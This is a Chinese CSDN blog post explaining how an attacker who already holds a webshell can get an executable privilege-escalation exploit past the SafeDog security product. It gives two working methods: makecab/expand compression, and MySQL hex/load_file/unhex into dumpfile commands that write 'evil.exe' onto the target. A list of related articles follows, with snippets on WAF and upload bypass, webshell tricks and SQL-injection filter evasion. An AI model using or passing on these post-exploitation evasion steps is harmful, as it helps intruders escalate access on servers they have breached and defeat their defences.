mysql特性绕过安全狗_两种绕过安全狗等上传可执行文件的方式

最新推荐文章于 2023-02-03 22:25:44 发布
最新推荐文章于 2023-02-03 22:25:44 发布
阅读量218 收藏
点赞数
文章标签: mysql特性绕过安全狗
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42498346/article/details/114882409
版权

在获取到webshell时,往往需要上传exe类型的可执行exp进行提权,但是如果对方装有安全狗等,通过webshell上传是会被拦截的,所以,可以试试以下方法:

一、打包为压缩文件上传解压

这种方法需要可以执行系统命令,话说回来,如果不能执行系统命令,上传提权exp意义也不大

windows系统自带zip,可以通过在本地压缩,webshell里解压释放exp,具体命令如下:

压缩文件:

makecab c:/evil.exe c:/evil.zip

解压文件:

expand c:/evil.zip c:/evil.exe

二、通过mysql等写入

可以通过mysql的hex函数将可执行文件转换为16进制文本字符串,再通过unhex函数转换为可执行文件,具体如下:

本地mysql中执行

select hex(load_file('c:/evil.exe')) into dumpfile 'c:/hex.txt';

目标mysql中执行

select unhex(load_file('C:/RECYCLER/hex.txt')) into dumpfile 'C:/RECYCLER/evil.exe';

小提示:导出文件时,建议使用into dumpfile,因为使用into outfile函数会在行末端写入新行,更致命的是会转义换行符,破坏源2进制文件。

第五流羽
关注
[网络安全自学篇] 八十.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入)
杨秀璋的专栏
05-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这篇文章将介绍WHUCTF部分题目,第一次参加CTF,还是能学到很多东西。下面分享四个我完成的WEB类型题目的解题过程,希望对您有所帮助。本来感觉能做出6道题目,但有两道题卡在某个点,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬
WEB渗透学习笔记7——webshell及上传绕过
林林木林林L的博客
08-01 3344
webshell 概念 web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,WebShell是一种用来进行网站和服务器管理的脚本程序,webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用一些服务器上系统的相关命令(比如创建用户,修改删除文件之类的),通常被黑客利用,黑客通过一些上传方式,将自己编写的webshell上传到web服务器的页面的目录下,攻击者通过上传WebShell获得Web服
安全狗上传绕过+wbehshell免杀
09-05
服务器安全狗是一款集服务器安全防护和安全管理为一体的综合性服务器工具。支持Windows全系列操作系统(Windows2003/Windows2008/Windows2012 32位 64位)、Linux操作系统的服务器安全防护软件,从驱动层直接屏蔽攻击,保护服务器安全。自2011年推向市场后,迅速在服务器安全市场里占有一席之地。 这篇文档总结了一些安全狗上传绕过经验,供参考。
安全狗文件绕过
weixin_30241919的博客
08-24 472
上传绕过WAF的一些常用方法 0X01姿势总结 (1)fuzz文件名后缀方法用burpsuite进行模糊测试,寻找黑名单之外的文件(2)windows系统可以进行后缀修改如:webshell.php……………..(3)路径绕过:有些WAF只会监视某个目录是否被上传webshell(4)大小写组合如:PhP,pHp(5)filename换行(6)多个filename(7)引号绕过如:双...
文件上传-绕过安全狗
weixin_44769042的博客
08-17 1525
实验环境 安全狗+phpstudy+upload-labs-master 安全狗开启后,会有一个后缀名上传黑名单 先上传一个图片马,抓包查看 若是正常后缀名,可以上传 换成.php ,就会上传失败 设法绕过(这里是以第二关为例,,过其他关时还要考虑那一关的代码绕过) 1.用单双引号防匹配绕过 将文件名写成 filename="php (去掉右侧引号,上传成功) 换成单引号也行(不加引号也可以) 上传成功,但是普通的木马文件会被扫出来 ...
web安全-数据包参数内容简介-文件上传WAF(安全狗)绕过方法
最新发布
ran的博客
02-03 1293
由编成的知识可以知道一个语句结束的末尾需要添加分号,而参数filename的后面没有分号,由此可知这一整条语句可能到filename就截止了,由此可以猜想如果filename后面加一个分号以后,其后面就可能还可以添加其它内容。因为安全狗的匹配机制是匹配双引号里的内容,但是这里的双引号有前没有后,它就一直在找后面的那个双引号,但是没有找到,所以可能没有匹配到。有的参数值加了双引号,有的参数值没加双引号,由此可以想到加了双引号的就是可以随便修改的,而没加双引号的可能就是有着固定的一些参数值。
安全狗 mysql_绕过安全狗进行sql注入(MySQL
weixin_34642354的博客
01-18 533
看我如何一步步绕过安全狗前言前几天渗透了一个站,由于没有做好善后工作被管理员发现了,再次访问那个站的时候,管理员已经删了大马,装上了网站安全狗(我估计大马应该是安全狗删除的,毕竟那个管理员真的太懒了,我的小马还在,并且居然菜刀还可以连接),为了给这个管理员增强点安全防护意识,我就开始研究起了安全狗绕过。 实验环境网站安全狗v4.0apache 2.4.27php 5.6MySQL 5.7 我们需...
mysql时间盲注if的绕过_MySQL时间盲注五种延时方法 (PWNHUB 非预期解)
weixin_42382703的博客
01-19 936
PWNHUB 一道盲注题过滤了常规的sleep和benchmark函数,引发对时间盲注中延时方法的思考。延时函数SLEEPmysql> select sleep(5);+----------+| sleep(5) |+----------+| 0 |+----------+1 row in set (5.00 sec)BENCHMARKmysql> select benc...
mysql 注入 绕过防火墙_新型渗透手法:利用XSS绕过WAF进行SQL注入
weixin_39852491的博客
02-18 274
*本文作者:风之传说,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。0×00 前言看到标题,很多人肯定会一脸懵逼,这是什么鬼。利用xss绕过waf进行sql注入?话说,没点意思的文章,我自己也不好意思写出来啊。通俗讲,就是XSS和sql注入相结合绕过waf。知识要能灵活运用嘛。做一个灵活的胖子(虽然我不是胖子)。0×01起因咳咳,还是来说下起因吧!最近遇到一个网站,有防火墙,而且极其变...
SQL注入技巧之显注与盲注中过滤逗号绕过详析
09-09
在过滤逗号的环境下,攻击者可以使用特定的SQL技巧来执行注入攻击,其中联合查询和盲注是两种主要的方式。 1. 联合查询显注绕过逗号 在传统SQL注入中,通常会使用UNION语句来连接两个查询结果,以获取额外的信息。...
FCK上传绕过安全狗一则经验谈
12-13
FCK上传绕过安全狗一则经验谈
绕过安全狗asp程序
06-06
可轻松绕过安全狗 突破安全狗的拦截 本程序仅供研究
绕过限制上传文件
10-05
文件上传漏洞是web安全中经常利用到的一种漏洞形式。一些web应用程序中允许上传图片,文本或者其他资源到指定的位置,文件上传漏洞就是利用这些可以上传的地方将代码植入到服务器中,再通过url去访问以执行代码。但在一些安全性较高的web应用中,往往会有各种上传限制和过滤,导致我们无法上传特定的文件。就需要用到这个工具去绕过各种限制上传文件
提权大马 秒杀安全狗 无后门 权限强大
01-05
asp 提权大马 秒杀安全狗 无后门 权限强大
MYSQL高版本低版本UDF提权工具
06-20
MYSQL高版本低版本UDF提权工具 很好用的UDF提权使用 有两个版本
文件上传绕过安全狗的一些方法
sGanYu
04-28 3952
目录 安全狗的安装 垃圾数据绕过: 数据包溢出绕过: 值匹配""的内容,后跟.php: 多个filename,绕过匹配: 白名单绕过: 测试工具:Burpsuite,安全狗 测试网站: 在没有安全狗的情况下,上传1.Php,以文件大小写后缀上传,是不会被拦截的,如下图 安全狗的安装 安全狗地址:网站安全狗-网站安全防护,防后门|防SQL注入|防CC攻击|网马查杀|防篡改,选择windows操作系统,Apache版本选择4.0,一直默认安装即可 在默认安装时,会跳出需要填写关于Ap
安全狗绕过
weixin_30564901的博客
07-01 993
3.5 加空格 换行 CoNtent-Disposition大小写或者空格或1 删除Content-Type: image/jpeg 删除form-data data前加空格 php后加:绕过 3.5文件名.php后面加#### form的m大写 ...
文件上传绕过安全狗
m0_50211409的博客
05-10 552
1,上传php一句话木马,提示不能上传php类型文件,只能上传 jpg.png.gif 通过弹框页面判断出是使用,前端代码进行验证的。 2,将前端代码删除,让他不能对上传类型进行验证。 发现删除后并不能进行一个绕过。 3,判断后端大概进行了后端验证将,php的一些文件进行了过滤。这时可以使用Apache的配置文件.htaccess进行绕过 我们上传一个自行编辑的名字为.htaccess文件。将Apache的htaccess进覆盖。 SetHandler application/x-httpd-php
mysql联合注入绕过安全狗4.0
https://www.cnblogs.com/zpchcbd/
05-13 1882
环境 win2003 apache mysql php 操作 http://192.168.1.131/Less-1/index.php?id=1 数值型注入 首先判断是否存在注入点 这里使用的是科学记数法 简单粗暴 http://192.168.1.131/Less-1/index.php?id=1e0 不变 http://192.168.1.131/Less-1/index.php?id=1...
Oracle注入技巧:绕过安全狗实践
本文主要探讨的是针对Oracle数据库的注入技巧,特别是如何绕过安全防护措施(通常被称为“狗”或WAF)进行有效测试和防御。 0x00 前言 Oracle数据库与MySQL在SQL语法上存在差异,因此在进行Oracle注入时需要了解其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值